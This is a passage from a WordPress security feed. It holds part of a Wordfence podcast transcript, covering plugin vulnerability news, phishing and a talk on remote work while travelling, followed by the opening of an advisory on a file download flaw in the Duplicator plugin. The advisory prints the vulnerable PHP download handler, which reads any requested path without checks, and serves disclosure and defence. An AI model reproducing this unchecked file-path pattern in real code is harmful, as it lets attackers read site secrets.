And one note with this, even though we have a firewall rule in place to help protect our customers, it doesn’t completely protect against exploiting this vulnerability. So what’s really important if you’re using wpCentral to make sure that your site, your plugin is updated to the most recent version. You see, the problem is that exploitation and legitimate request via wpCentral look pretty much the same. So, if we’re going to block access to it being exploited, we would have to block legitimate requests as well. So, update your plugin.

The next vulnerability is a little scary. We heard about this actually from a customer, from a user who had seen some negative things happen on their site, and upon further investigation, we found that there was a zero-day vulnerability in a plugin called ThemeREX Addons, and that this is currently being exploited in the wild. We were seeing some REST endpoint usage that, because the REST-API endpoint was unprotected and improperly configured, we were seeing attackers actually adding malicious administrative users to sites that had this plugin installed.

So, we’ve investigated this and it appears that the REST-API endpoint within this plugin is unprotected and improperly configured. Attackers have already discovered this, and they are actively exploiting this on sites that are using this plugin. We estimate that there are probably about 44,000 sites that are using this plugin that are vulnerable. So we pushed out a firewall rule to premium customers. So they received that rule on February 18th at approximately 3:16 PM UTC to protect against this vulnerability being exploited. Free users will not receive this rule until March 19th. So if you are using this plugin, we are recommending at this point that you delete it from your site. Don’t just deactivate it, just delete it. It’s very good practice to remove any and all plugins that you don’t need on your WordPress sites if you’re not actively using them. And if you’re actively using this one, you obviously have to throw this in the balance.

What’s more important, keeping your site safe from intrusion or the functionality that you are receiving from this plugin? If the functionality is so great that you’re willing to take the risk, well that is your choice. If you positively need this functionality, now’s a good time to look at Wordfence premium because that’s going to protect you even though you’re using a vulnerable plugin. Now we don’t have a ton of data on who’s exploiting this vulnerability or what exactly they are doing other than the fact that we have seen suspicious administrative accounts on sites using this plugin. We will provide more details as they emerge. So if you’re unsure about this plugin and where it shows up, the plugin slug is “trx_addons.” So you would see that in your plugins directory.

So I guess now’s a good time to explain what a zero-day is. So a zero-day can be referring to a software vulnerability or it can be referring to an exploit. So it is a zero-day vulnerability or a zero-day exploit. So zero-day vulnerabilities refer to security holes in software. And now it could be in WordPress, it could be in your browser and could be in your phone. It refers to any vulnerability that exists in software. Now zero-days are not known to the software maker or to antivirus vendors. And so even though this vulnerability is not publicly known, it may be known to attackers who are quietly exploiting it, such is the case with this plugin. So think of a zero-day as basically an unlocked door, an open window, just a way into a system that attackers know about. As I’m sure you’re aware, zero-days are never any fun. You probably don’t discover that your software is vulnerable until you see exploits coming at it. And this is extraordinarily unfortunate when the users of your software are the ones experiencing the exploits.

Our final plugin vulnerability of this week was discovered by our friends at WebARX Security. They found a critical issue in ThemeGrill Demo Importer and this critical vulnerability led to database wipe and authorization bypass. So basically, it was allowing any authenticated user to get into a website, wipe the database, and basically become an administrator. At the time of discovery, this plugin had over 200,000 active installations and it was used to import official theme demo, content, widgets, and other theme settings with just a click. It was not required in order to use any of the ThemeGrill themes. It was just something that basically helped you get started. So it was not something that really needed to remain on a WordPress site. Yet many users, over 200,000 of them, had this installed. Now, after this vulnerability was disclosed, the install count dropped drastically. I guess people were saying, “Hey, I don’t really need this after all.” WebARX discovered this on February sixth and released a patch to all of their customers and reported that issue to the developer. And the developer published a new version which fixed the issue on February 16th.

So either update that plugin or if you’re not using it, just remove it from your site. Just another lesson in keeping your WordPress installations pretty tight and clean. If you are not using a theme, you should remove it. Don’t just deactivate it, actually remove it, delete it from the site. If you aren’t using a plugin, don’t just deactivate it. I have cleaned numerous sites that basically looked like the digital edition of Hoarders with hundreds of plugins installed and all deactivated and, of course, not updated. Really keep your WordPress installations updated and clean and of course, use Wordfence.

In non-WordPress security news, we have a couple of stories that I just wanted to bring to your attention. First of all, of course, there is fear in the world. Everyone is very concerned about the coronavirus, and phishing scammers see this as a perfect opportunity. Because when you are in a state of fear, you are apt to make decisions that you normally wouldn’t in your life. So phishing scammers are posing as the World Health Organization (WHO) and they’re trying to exploit coronavirus fears.

So, the WHO says that they are seeing offending emails, asking recipients to hand over sensitive information like usernames and passwords, and they’re including malicious links and attachments that are triggering installation of malware. Any time you see an email that is triggering fear, that is asking you to take immediate action or grave things are going to happen in your life, you need to take a step back from the computer and take a deep breath, and then maybe take another deep breath, and look carefully with a discerning eye at whatever is trying to trigger you into taking immediate action. Scammers prey on our fears and they prey on our fear of missing out, our fear of loss. And it’s just extraordinarily unfortunate as we are all dealing with this crisis that scammers are stepping up to the plate and taking a swing. But hackers gonna hack and scammers gonna scam, and it’s just up to us to remain vigilant. And it’s important for us to not just remain vigilant for ourselves and for our family, but for our community as a whole.

Spread the word, educate older people who are often victims of scams like this, let them know what phishing is. Let them know how phishing works and let them know how scammers work. And it’s not just happening in emails, I’m sure. I’m sure it’s happening via telephone, via text, and it’s important for us to educate everyone we can so that everyone can stay safe. When everyone’s safe, it takes away the financial incentive that scammers and hackers have because we are on to them. Scammers and hackers and even spammers wouldn’t do what they do if it wasn’t profitable. So by reducing the surface area of their profitability, by keeping our communities safe, we make the world safer for everyone.

And in our final story, Malwarebytes Labs released their State of Malware report for 2020 last week. They took a look at the threats to both Mac and Windows/PC. The TL;DR, or the too long/didn’t read, of this entire thing is that malware and hackers and scammers and everyone we’re fighting against are becoming increasingly sophisticated.

What does that mean to you and me? It means that our defenses need to become increasingly sophisticated. So, I’m a Mac user, and I remember a time not long ago when Mac users were able to say, “Well, we don’t get malware because all of the malware is on Windows.” In 2020, Malwarebytes is reporting that Mac threats increased exponentially in comparison to those against Windows. Now, something to consider is that more Mac users are using Malwarebytes, so of course, they [Malwarebytes] are seeing more malware. When calculated as threats per endpoint, however, Mac still outpaced Windows by nearly two to one. So maybe, I need to apologize to all my Windows-using friends. Another takeaway from this report is that if you are working in the enterprise, the volume of global threats against business endpoints has increased 13% year over year, with aggressive adware, Trojans and HackTools leading the path.

Organizations are being hammered with Emotet and TrickBot, two Trojans turned botnets that surfaced as the top five threats for nearly every region of the globe. TrickBot detections in particular had increased more than 50% over the previous year. I’ll have a link to the full report. The biggest takeaway I think just looking at the state of computing right now is that it is incredibly important for us to stay on the front lines, to stay informed. Education is the number one tool in staying secure. If you know what the hackers are up to, it is incredibly easy to stay protected. If you are unaware of how malware works, of how hackers work, how scammers and spammers and phishers and all of these bad guys are operating, this is when you are caught by surprise.

So, we are here to ensure that you are aware of what they’re up to so that you can protect the things and the people and the websites of course that are most important to you. That is the news for this week.

Up next is Chloe Chamberland at WordCamp Phoenix. We hope you enjoy this [talk]. You can also watch the full [talk]; it is released on our YouTube channel with all of Chloe’s slides. This is a good one to watch actually because you can see all of Chloe’s amazing pictures of all the places that she has been fighting the bad guys and helping customers recover from those attacks. She has been to some pretty amazing places. So thanks for listening and we will talk to you soon.

Chloe Chamberland:
So, who am I? I am a threat analyst at Wordfence. I go on the hunt for vulnerabilities and things inside of plugins and themes, and I have worked in multiple roles there. So I used to be a site cleaner, so I would clean hacked sites and work with customers for that. And I used to be a customer service engineer, and so I was heavily [involved] or helping customers. And I did all three of these roles while traveling. So I think you can handle just about any role working remotely, and I highly recommend doing so. And I like to say I have two passions. I love security and I love traveling and I get to do both and it just makes me really happy and excited and hopefully I can inspire you to start traveling while you’re doing it or give you some tips if you already do.

I never really decided, I want to just go travel and work at the same time. It just kind of happened naturally. So I never really did any research. And so today I’m going to share with you some of the things that I learned from it and share with you some of the experiences I’ve had, and see why you might want to do it. So where I’ve been, I’ve been kind of around the world a little bit. I’ve been to China, Japan, London, Barcelona, Italy, a bunch of places in the States, a bunch of places in the Caribbean, a bunch of places in Canada. Last year, I spent 150 days away from home and this year my goal is 220 days away from home. And I’m hoping eventually I can go fully remote, like three months at different places all year long. I just have cats, and I need to figure out a way to get them to come with me because I love them so much.

Okay, so why travel when working? I feel like there’s kind of this connotation that when you’re traveling, you’re on vacation almost, but it’s not like that at all. It’s totally different. You’re traveling. It’s not always peachy and easy and it’s a challenge, but I genuinely think it’s so worth it. And I think if you’re at home working and you don’t have anything to do after work or things like that, why not be somewhere else in the world and be somewhere where you can explore at the end of your work day?

And so that brings me to travel is worth it. I have this quote from Anthony Bourdain that I just wanted to read. “Travel isn’t always pretty, it isn’t always comfortable. Sometimes it hurts. It even breaks your heart but that’s okay. The journey changes you, it should change you. It leaves marks on your memory, on your consciousness, on your heart, and on your body. You take something with you, hopefully you leave something good behind.”

And I think this applies both to working while you’re traveling and just traveling in general. It’s not always going to be easy. It’s not always going to be pretty. You’re going to see different things that are going to open your perspective and change your mind, but it is so worth it and it makes you a better person every single day and it makes you appreciate a lot of things in life more. So, one of the first main points is you’re going to have beautiful experiences. You’re going to see different places, you’re going to try different foods, you’re going to meet amazing people. And I’m about to start crying.

So, when I went to Japan we were standing in the subway just like trying to figure out where to go. We knew where we were going. We were just kind of indecisive and these two boys just came up to us and were like, “Do you need help? Do you know where you need to go?” And it genuinely touched me so much that these people cared to help, and the same thing happened in Vancouver. We were lost, and someone came up to help. And I love interacting with these people that are just so willing to help and you get to experience these different cultures and you get to see these amazing things and I think that definitely makes travel while you’re working completely worth it even though there’s challenges. Which brings me to my next point: you’re going to have difficult challenges, and you’re probably wondering why I would put this as why do you want to travel and work at the same time? But I’ll get to that in a second.

So you’re going to experience things like not having your VPN work when you need it to work. And that’s something I experienced in China. I didn’t plan, I obviously didn’t do any research and when I got there my VPN didn’t work and I need my VPN to do my job. So I just ended up having to take the whole week off which kind of sucked because I like to keep working and save my PTO. And then you’re going to have challenges like wifi not working and you’re going to have just general travel challenges which is being in a different place after spending 36 hours on a plane. You were working on the plane, you could barely sleep. I have problems sleeping on planes. But with those difficult challenges and those beautiful experiences, you’re going to have personal growth. You’re going to grow as a person.

I personally have very bad anxiety, which has gotten so much better since I started traveling. I don’t do well in crowded spaces or things like that, but as I’ve traveled more and experienced different things and grown from these experiences, I have become less anxious of a person. And you can also just grow in the mindset. You can open your mind so much more and be more appreciative of everything in life. Which brings me to my next point: you’re going to have a lot more positive energy and happiness. I’ve been through things traveling, and you would too probably, that would be challenging at the time. But you learn from those experiences and eventually things aren’t as bad as they were when you first started. You’re going to be more positive, you’re going to have a better outlook on things in certain situations, and things that were bad, weren’t. And then with happiness, I am personally really happy because I travel all the time. I got to see a moose last week in Alaska, and I almost cried.

I feel like I get to be happy almost every single day. I mean obviously not every single day, but I definitely think that traveling has generally made me a happier person. And then for me, since I love my job so much, I feel like traveling helps me have a better work-life balance. So if I’m at home, I can sit on the computer all day just because I love my job, and I don’t want to disconnect from it. But when I’m traveling, I have that ability to disconnect because I have something else that I love that I want to go do and I want to go explore. And I think if you have that same passion for your work, you might also have that same issue. So traveling might help you break away from working all the time, every day.

And then, where to begin? So you want to become a remote traveling worker and you don’t know where to start. Well, hello, hello. Okay. First things first, if you get a remote job if you don’t already have one or if you work for a company, you can try talking to them and seeing if they’d be willing to work out like you traveling for a little bit at a time and things like that. There’s so many great options. We’re obviously at a WordCamp, and so you can develop plugins, you can become a blogger, you can do so many different things. There’s so much freedom with WordPress and I think that’s how we all can have the ability to work remotely and then travel while doing so.

And then this one is make sure you’re prepared for your first trip if you haven’t done one yet. More so mentally. Things aren’t going to be perfect and you need to understand that things will go wrong and things are going to be frustrating. And just make sure you’re ready for that, and make sure you’re ready for things to go wrong. And I think that’s where you should be prepared, and you should plan like I never did.

And so then you’re going to want to plan your first remote work trip. My first trip was to Vancouver, it was a couple of weeks after I started at Wordfence, and I missed a meeting because they said I didn’t have to go to all the meetings, and I shouldn’t have done that. And I learned from that. And so with that trip I was on a boat for a couple of days and then in the Vancouver Harbor, I want to call it, I don’t know. But the first night we got there it was raining, and it was after a long flight and we took a dinghy out to get to the boat and it wasn’t the best. But then the second night it was great.

And so for your first trip I suggest doing a small little thing that is really memorable and then for the next few days, make sure you’re working while you’re there and seeing how it kind of flows. So when I travel now, I mostly do my things on the weekend, and I work during the week and just kind of get a feel for how that’s going to go for you.

And then I want to recommend starting small and gradually increasing your trip length. So don’t decide, oh, I’m going to go travel forever and find out you don’t like it just a couple of weeks into it. So I recommend starting smaller and then gradually increasing your trip lengths as you go. That’s how I kind of did it. I live in Florida, so I made little trips to Disney and St. Augustine and things like that. And it just kind of grew and grew over time. And last year I did two months away from home. And this year I have a few trips planned where it’s a month away and then I come back for a month.

And then once you have a feel for it and you decide that you do like it, I recommend determining how long you want to stay at places. I kind of figured out that a week isn’t really enough for me and I want to start staying at places for like a month at a time so I can kind of immerse myself a little bit better. Because when you’re working every day you don’t have as much time as if you’re just going to one destination. So I highly recommend staying longer, but figure out what works best for you. So my best single piece of advice is going to be to plan. That’s what I never did, and I think that would have saved me from so many different sticky situations that I had.

Determine your comfort zone. So, in that photo there’s a little outhouse. This is where I stayed in Alaska. It’s negative 30 degrees (Fahrenheit) there and I had to go to the bathroom in the outhouse and I was not okay with it at the start. But I actually enjoyed it, it’s nice, you have the birds chirping outside. And it wasn’t in my comfort zone before, but it’s in my comfort zone now. And so kind of figure out what your comfort zone is and then make sure you adapt with that over time. Figure out what kind of places you want to stay at, where you want to be. Do you want to be in places with lots of people? Are you going to be in places with little bits of people. And do you want to have fast working wifi all the time or are you comfortable working on one megabit per second? And kind of figure out what you’re comfortable with.

So, my second piece of advice is to budget accordingly. On my two month trip last year I was supposed to go to Paris at the end of it. I had flights booked and everything, but I ran out of money so I had to fly back home and that kind of sucked because I really wanted to go to Paris. But the lesson was learned there. Make sure you have enough money, budget accordingly. Make sure you say, “Okay, I’ll spend this much on food tonight. I’ll do that tomorrow.” I’m kind of in this place where I cook every night and then like do one night out at a nice place or do snacks here and there so I can try to taste all the different places. It’s important to consider accommodations, food and everything and your flights and make sure you budget accordingly.

Determine your workspace requirements. This is my boyfriend, we were at the Shanghai airport and that’s our makeshift desk because there were no tables or chairs available. Two luggages stacked on top of each other. And then our carry-on bags were our chairs. So you kind of want to determine are you comfortable working in a bed? Are you comfortable working at a desk? Do you need a co-working space? Do you need these certain things? And then you’ll also want to take that into account when you plan where you go and your budget. So if you want to go to somewhere, you’ve just got to make sure that they have your workspace requirements ready for you.

And then work out your work requirements. Like do they require you to use a VPN? Do they require you to do full disk encryption? Do they require you to not go to certain places? And I also would like to recommend that you talk to them and let them know when you’re going to be places, and if you work for yourself, this is not relevant. But if you do work for a company, make sure you let them know where you’re going. That way if you have any hiccups like I did, then they are already informed, and they’re going to be willing to help you and work things out with you. And then set your schedule accordingly.

There’s different time zones everywhere and if you’re on one side of the world and you work for a company and they’re on the other side of the world, or you’re a freelancer and you work with clients and they’re on one side of the world and you’re on the other, you need to make sure you’re setting your schedule accordingly and making sure you’re going to be available for anybody that might need you at work. When I went to China, my plan was to work from eight to 12 in the morning and then eight to 12 at night and then get my rest and do things during the day in that eight hour chunk. And well I ended up not being able to work. But that was my plan and I think you should set schedules in advance and then try and work with those when you’re in the place.

Now, always remember that things will not always be perfect, like ever. Hiccups are always going to happen. I don’t want to say never going to go as planned, but it probably isn’t going to go as planned a lot of the times. And so you just got to keep that in mind. And you got to take things slow and absorb everything. You got to make sure that even though things aren’t always perfect, you want to make sure that you’re still enjoying every little thing. So when I went on a Norwegian fjord cruise, my wifi cut out halfway through the fjords and I was pretty bummed about it, but I was like, “You know what? I’m in Norway, I got to just breathe, I can’t get my work done, it’s not going to be a problem.” And so you got to make sure that you remember to take everything in even though work things might not go as planned. Because you can always work and make up your work. It’s not always guaranteed that you’re going to go back to a certain place that you’ve been or experience one particular moment that you’re in.

And then document everything. Make sure you take a lot of photos, make sure you take a lot of videos, write down notes. I think this is really important because once you’ve gone to a lot of places, you might start slowly forgetting certain things and then when you have these photos to come back to, you’ll be like, “Wow, I totally forgot about this. But I really loved it.” And I’ve had that happen multiple times and I think it’s very important to document everything. And then consider private journaling or blogging. We have WordPress, we can make blogs and we can share our stories with everyone. That’s something I’m personally trying to work on now is coming up with a blog and I’m trying to share my stories with other people. Because I have something to learn from you and you have something to learn from me, hopefully. Maybe. Yeah. So I like to share what I’ve learned and things and I think it’d be great if everybody shared everything that they learned. Because then everybody would not know everything.

And then I have some helpful resources for success. So this is a program called Remote Year. They provide, I think I want to say 3, 6, and 12 month programs. And they take care of your travel and accommodations and things like that. I think it’s five grand for a down payment and then two grand a month.

This is if you want to work and not have to worry about any of the travel planning. My favorite part is the travel planning, so I like the flexibility and freedom and finding good deals and things like that. So this isn’t for me, but it definitely can help you out if you don’t want to have that headache.

And then workingnomads.com is a place where you can find remote jobs if you don’t already have one. I like that the first three were WordPress because Automattic is a fully remote company as is Wordfence and a lot of other plug-in companies, and WordPress hosting companies.

Okay, and then I wanted to show you this one, Nomad List. It’s a really awesome resource and it can help you plan where you’re going to go. So let’s say you want to stay somewhere where the internet speed is higher, you can select internet speed right here, and then you can scroll down and you can see a lot of places that have higher internet speeds if that’s a requirement for you.

And then you can see the cost of living, you can see a cost of living for family, you can go to the scores, you can see the nomad scores, internet speed, humidity, walkability, all sorts of helpful resources for you to decide where you want to go on your trip.

Audience question:
Can you put up that last website you mentioned and the name of it again?

Chloe:
This one? Working Nomads.

Audience question:
No, the one you just finished.

Chloe:
Nomad List?

Audience question:
Yes. Thank you.

Chloe:
Yeah. And then I like to recommend Airbnb for accommodations and you can find really good bargains on there. In Thailand, you can stay there for $300 a month, which is on my list of places to go, and so you can find really reasonable places. And if you’re going to be traveling and you want to keep your house and you’re comfortable letting people into your home, you might want to consider Airbnb-ing out your house. You don’t have to do that obviously, but you can consider doing it. I personally do it and it helps me travel more, so I definitely recommend looking into that if it’s an option for you.

And then, because I’m a security professional, I just wanted to throw some security tips at you for while you’re traveling. Use a VPN wherever you go. If you’re going to be working in coffee shops and in public spaces, you want to use a VPN to make sure that your traffic is going to be encrypted when it’s running through the web. And make sure that nobody can eavesdrop on your traffic and steal work data or anything like that.

I recommend using a password manager and an authenticator app. Make sure you have one that’s going to be compatible with your phone and your computer. There’s LastPass, 1Password. Those are the two that come to my mind. Use an authenticator app that works offline.

Don’t use SMS. SMS isn’t secured, kind of. So use an authenticator app because if you go on a cruise like I do, you don’t have … I don’t pay for Wi-Fi on more than one device so I can only have one device logged in at a time. And having an authenticator app that works offline allows me to do that and log into my sites without having any issues.

And then use full disk encryption. If your devices are ever stolen, people won’t be able to steal the information off of your devices. And if you’re storing work data on there, this is pretty important because you don’t want someone to get ahold of any secret information.

Disable Bluetooth when not in use because if you’re working in public spaces and you have Bluetooth enabled, people can actually intercept the session and get access to your phone and things like that. And you don’t want that to happen, especially if you’re dealing with work.

And then be aware of your surroundings. Consider getting a privacy screen on your computer. If you work on airplanes and things like that and coffee shops, you don’t want people to be able to look at your screen and see what you’re doing. I work on airplanes a lot of the time. And I need to get a privacy screen and things like that as I start traveling more, and it’s definitely something you should consider. And just generally be aware of your surroundings, and seeing if anybody’s trying to look at your computer or things like that.

Then thank you. You can find me on Twitter @infosecchloe. You can email me at chloe[at]wordfence.com if you have any questions. And, again, my slides are available at chloechamberland.com/wordcampPhoenix. And now I’m happy to take any of your questions.

Chloe:
Yes?

Audience question:
What do you recommend for a VPN?

Chloe:
What do I recommend for a VPN? I use PIA. There’s several different options, though, so I recommend just looking up the best VPN options and then looking at some of the reviews of the top few and then seeing what works best for you.

Chloe:
Yes?

Audience question:
How do you pay for [inaudible] cash or do you just pay with credit card?

Chloe:
What was the question? It is how do you deal with different currencies at different locations?

Audience question:
Yeah.

Chloe:
I use credit cards and then sometimes I take out cash. I have a zero … I have a fully online banking company that does zero charges on ATM withdrawals and foreign transaction fees. So that’s definitely the way to go.

Audience question:
Can I ask what bank that is?

Chloe:
Yeah.

Audience question:
What bank is that?

Chloe:
Oh, what bank? I use Bank of the Internet.

Audience question:
Bank of the Internet.

Chloe:
Yeah. Oh, sorry. It’s called Axos now. Yeah, they changed the name.

Audience question:
What did you do with the cats? What did you decide?

Chloe:
What did I do with the cats? They’re at home, and my boyfriend’s mom watches them for us every time we go. I need to get them to come with us.

Audience question:
What do you do about a hot spot or cellular Wi-Fi access?

Chloe:
What do I do about a hotspot or cellular Wi-Fi access? I currently don’t have a hotspot yet, but that’s something I’m looking into right now. I usually just use my phone in the U.S. as a hotspot. But my cell phone, I have T-Mobile and it works in just about every country out there. So that’s what I do for my cell phone.

Audience question:
And when you said you were working with clients, how are you communicating with them? What app or resource are you using?

Chloe:
Yeah, so at work, we use a ticket manager system, because I was dealing with customer service regarding plugins and things.

Audience question:
… calls with them or anything?

Chloe:
No, no calls. It was fully online. Yeah. Any other questions? Yes?

Audience question:
What’s the longest trip you’ve taken?

Chloe:
The longest trip I have taken was two months long. Yeah. I’m hoping to go fully remote eventually.

Audience question:
Where to?

Chloe:
That was the one to … So we took a cruise to London and then we had to fly back to do something real quick. And then we flew back to London, took a cruise to the Norwegian fjords, and then we flew to Italy from there, spent a few nights in Rome, then went to Venice, and then we flew from Venice to China and stayed in Beijing for a few nights, and then we took a cruise to Japan, went around Japan a little bit, and then Japan back to China, went to Shanghai, went to Disney a little bit, and then that’s when we had to fly back home. So we went to Seattle, stayed there for a couple of nights, and then flew back to Florida. Yeah, it was fun.

Audience question:
So with your current job, is it project based where you can kind of go on whenever you want as long as you do 40 hours a week? Or do you have to log in at certain times just with the time zone difference. I’m curious.

Chloe:
Yeah. So my work is pretty flexible. I don’t have to deal with customers as much anymore. I do have core hours, but it’s only like a four hour time period. And the people I work with are so flexible that it’s not that big of a deal to have to be there as long as I communicate with them and let them know, “Hey, I’m going to China. The time zone’s 12 hours different,” and they’re really flexible working with me. Yeah.

Chloe:
Yes?

Audience question:
How do you keep yourself focused on your work and not get distracted by other things when you’re working?

Chloe:
So how do I keep myself focused and when I’m traveling? I love my job. I really do. So that really helps me sit down and get my work done. I get to go hunting for vulnerabilities and plugins and things. I have free rein to just explore. I absolutely love it. And so that’s kind of what keeps me settled in.

And so if you’re planning on going remote and working and things like that, find something you love to do. It’ll help you.

Chloe:
Yes?

Audience question:
You mentioned Airbnb. Were there any other resources you use to find lodging?

Chloe:
Yeah. So I mentioned Airbnb. Is there any other resources? There’s Vrbo. Hotels are always an option. I generally stick to Airbnb. That’s just my favorite platform to use and it’s really easy and I can always find cheap things for wherever I need to go. So that’s my main one.

Audience question:
The one time I’ve used Airbnb, I had a rude shock because it wasn’t what it was advertised as. …

Chloe:
I haven’t had that happen. I’ve stayed at several Airbnbs. But that can happen. You have hosts opening their homes. It can take … Actually, I did. Okay. So I just remembered. So when I went to Vancouver on that boat, there was these pictures of this really nice boat, clean, had like a nice table and everything. And I got on it and it was raining and everything and the boat was not what it pictured at all. The bathroom was really small and there was no area to sit. It was just a bed that was damp and cold, and not like the photos at all.

Chloe:
But I still like Airbnb and I gave it another shot, and I’m actually staying at one down the street and it’s nice, and it’s nice to have a kitchen and things like that with it.

Audience question:
You’ve found that it’s generally honest?

Chloe:
Yeah, it’s generally honest. Yeah. Yeah.

Audience question:
Do you mind if I add to that question, too?

Chloe:
Yeah, of course.

Audience question:
So another cool way to travel, if you’re looking for lodging options or alternatives, you can do house or pet sitting in different countries and so you stay at that house for free. Sometimes they’ll even pay you or leave food in the house for you. So if you’re going to be working remotely, you can stay at someone else’s house, maybe just pet their cat every few hours and make sure it has food and get free rent. So that’s another idea.

Audience question:
That’s nice. Thank you.

Audience question:
Yeah.

Chloe:
Yeah, I know exactly what you’re talking about because I looked into that. I don’t remember the name of it, though.

Chloe:
Yeah?

Audience question:
Do you ever hire a local to be a guide for language purposes?

Chloe:
Do I ever hire a local to be a guide for language purposes? Not right now. I haven’t really gone to anywhere yet that’s been like too drastically different where I required that, but I’m going to Morocco next month and I was going to hire a guide for a day. It’s actually really reasonably priced there, and so that’s somewhere I’m going to do it.

Audience question:
And how do you find them?

Chloe:
Airbnb. They actually have experiences now and so that’s where I’m going to test this out and see how it goes.

Chloe:
Any other questions?

Audience question:
Where are you going in Morocco?

Chloe:
I’m going to Marrakesh.

Audience question:
You going to go to Chefchaouen?

Chloe:
What’s that?

Audience question:
You going to go to Chefchaouen?

Chloe:
No. What’s that?

Audience question:
The Blue City. It’s [inaudible 00:47:46] one of the Atlas Mountains.

Chloe:
Okay. I’ll look into that. Thank you.

Audience question:
Have a nice trip.

Audience question:
Where all are you going on your next trip?

Chloe:
So next month I am going on a transatlantic cruise. I’m going to get dropped off in Barcelona where I fly to Morocco and then I’m going to spend a week in Marrakesh and then I’m going to fly to Sweden, spend a week there. I’m going to come home. I’m going to be there for two weeks and then I’m going to take another cruise that drops me off in London, fly back from there. And then the next month, I go off to Japan, which I’m really, really excited to go back to. I’m going to be there for a week and a half, do another cruise, a transPacific that takes me over to Vancouver, and then I’m going to fly home.

And then I have some more trips planned towards the end of the year, another couple of cruises in Japan. And then at the end of the year, I really want to go to Europe for a month and see all the Christmas markets in December.

Audience question:
I know cruise internet is often slow and expensive. What do you do for that?

Chloe:
Yeah, it is really slow. What I do is I just kind of account for that and spend a little bit of extra time each day. And I stick to one cruise line, Royal Caribbean, because they have the cheapest Wi-Fi, so that’s how I make that work.

Chloe:
Any other questions? Yes?

Audience question:
You seem to be traveling quite a bit. Is it by choice or is it because your employer requires you to be at the location?

Chloe:
Is it by choice or is it because my employer requires me to be anywhere? It’s completely by choice. I choose to do this all the time and I really enjoy doing it.

Audience question:
I remember doing a lot of work for customers in California. And then when I moved out here to Tucson, to Arizona, I found that we worked together for a while, but after six months of not being in contact with them face to face, they started losing interest and then going elsewhere to somebody else that they developed a relationship with. How do you keep the relationships going when you’re not there?

Chloe:
So I work for a company, and they’re just fully remote, and so all of our communication is done through the ticketing platform. And I’m not sure why they haven’t lost touch. It’s not like we provide like a long-term service to our customers. It’s more of like one time kind of thing.

So like when we clean a hacked site, it’s going to happen one time, so I would communicate with them for a day as I clean their site, and they would go about their way. And if they ever had any problems, they would just come back to us and we could help them out there.

Specifically speaking towards keeping relationships, I could recommend conference calling. Did you do that? Like face-to-face on Zoom.

Chloe:
We do that now.

Chloe:
Yeah? Okay.

Audience question:
And you don’t have trouble with connectivity with the Zoom call or something like that?

Chloe:
No, I’ve been able to handle my meetings and things like that just fine wherever I’ve been.

Audience question:
Was the question about …

Chloe:
Communicating with customers. Yeah.

Audience question:
Yeah. …

Chloe:
Yeah, yeah. Mark’s back there. He can definitely help you with that. He’s the CEO of Wordfence and knows how things run. All right.

Audience question:
Are you going to any WordCamps?

Chloe:
I’m going to WordCamp Miami at the end of this month, and then from there I’m not sure yet, but I’m sure I’ll be at more.

Audience question:
Awesome.

Chloe:
Any other questions?

Audience question:
If there are any apps that are helpful for traveling?

Chloe:
Any blogs?

Audience question:
Apps.

Chloe:
Apps? I personally don’t use any so I couldn’t give you any right now, but I definitely need to look into some that can help manage my travel a little bit better. I just haven’t had time to fully dive into that.

Audience question:
When is your blog starting?

Chloe:
When is my blog starting? Yeah, so my website is chloechamberland.com and I’m hoping to start writing posts for that, and I’m trying to share everything I’ve learned and hopefully give tips and things like that so it makes it easier on other people, and maybe people will comment and give me their advice, too, because I’m always welcome to learning more things.

Any other questions? All right. Thank you guys so much.

Kathy Zant:
Thank you for listening to Think Like a Hacker episode 66. We hope you enjoyed it. If you’d like to follow Chloe, she is @InfoSecChloe on Twitter. You can follow me @KathyZant on Twitter. You can also follow the @Wordfence account with all the latest news about WordPress and security.

And we’d love to hear from you. If there’s someone you’d like us to talk to as an interview subject or if there is a topic you’d like us to explore more in depth on Think Like a Hacker, we’d love to hear from you. press@wordfence.com comes straight to me, and I can make those dreams come true.

Thanks again for listening and we will be back again next week. If you’re going to be at WordCamp Miami, please do find me. Say hi. I love to hear from people who are listening to the podcast. We’ll talk to you soon.

The post Episode 66: New Plugin Vulnerabilities & Succeeding as a Digital Nomad with Chloe at WCPHX appeared first on Wordfence.

Active Attack on Recently Patched Duplicator Plugin Vulnerability Affects Over 1 Million Sites

Description: Unauthenticated Arbitrary File Download
Affected Plugin: Duplicator
Affected Versions: <= 1.3.26
CVSS Score: 7.5 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Patched Version: 1.3.28

A critical security update was recently issued for Duplicator, one of the most popular plugins in the WordPress ecosystem. Over a million WordPress sites were affected by a vulnerability allowing attackers to download arbitrary files from victim sites. We urge all Duplicator users to update to version 1.3.28 as soon as possible.

We are detecting active exploitation of this vulnerability in the wild, and estimate more than half a million sites are still running a vulnerable version. Built-in firewall protection prevents these attacks for all Wordfence users, both Premium and those still on the free version of Wordfence. As always, it’s still important to perform security updates regardless of other protections.

In today’s post, we’ll take a brief look at the vulnerable code, discuss its severity, and share details of the ongoing attacks against it.

File Download Vulnerability Analysis

The Duplicator plugin helps site administrators migrate and copy WordPress sites. Part of this functionality involves exporting database and file content into portable archives. When an administrator creates a new copy of their site, Duplicator lets them download the generated files from their WordPress dashboard.

Screenshot of a Duplicator download prompt.

This was implemented as an AJAX request within Duplicator’s admin interface. The download buttons each trigger a call to the WordPress AJAX handler with the action duplicator_download and a file parameter, indicating the location of the file to be downloaded. When clicked, the requested file is downloaded and the user doesn’t need to leave or reload their current page.

public static function duplicator_download() {
        $file = sanitize_text_field($_GET['file']);
        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
        // Process download
        if(file_exists($filepath)) {
            // Clean output buffer
            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
                @ob_clean();
            }

            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($filepath));
            flush(); // Flush system output buffer

            try {
                $fp = @fopen($filepath, 'r');
                if (false === $fp) {
                    throw new Exception('Fail to open the file '.$filepath);
                }
                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
                    echo $data;
                }
                @fclose($fp);
            } catch (Exception $e) {
                readfile($filepath);
            }
            exit;
        } else {
            wp_die('Invalid installer file name!!');
        }
    }

